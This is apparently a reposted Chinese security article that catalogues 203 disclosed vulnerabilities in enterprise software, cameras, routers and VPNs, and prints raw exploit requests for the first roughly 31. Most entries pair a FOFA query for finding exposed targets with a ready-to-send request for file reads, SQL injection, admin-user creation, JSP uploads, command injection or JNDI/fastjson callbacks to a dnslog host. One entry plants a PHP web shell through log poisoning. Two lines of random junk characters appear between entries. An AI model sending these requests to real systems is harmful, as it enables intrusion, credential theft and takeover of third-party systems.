Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界; author: 网络安全新视界
Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive and defensive security exercises; we hope this article helps with defense. Defenders can use its contents to check for exposure.

Vulnerability sources: this article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled and published by the 网络安全新视界 team.

Security patches: all of these are publicly disclosed vulnerabilities; for patches or remediation plans, contact the product vendor.

Article content: because of length limits, a few POCs that are too long are uniformly replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if the content infringes any party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Those who need it can bookmark this article or follow this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) mobile campus service management platform service.action remote command execution
77. F22 garment management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

0 a* c) N, X6 s: k2 y0 D. m3 N1 N- J: R5 J4 g( w
6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

3 O) L8 u5 }3 q8 E/ s6 I# Y, m  D& U% V3 Q
8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; it executes the function and applies base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

The dsname value is handed to a JNDI lookup; a DNS query for the dnslog host confirms the lookup happened.

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded content is then served at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

The injection point is the billitem query parameter; the multipart body only needs to be present so the handler runs.

31. Yonyou NC runStateServlet SQL injection
version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
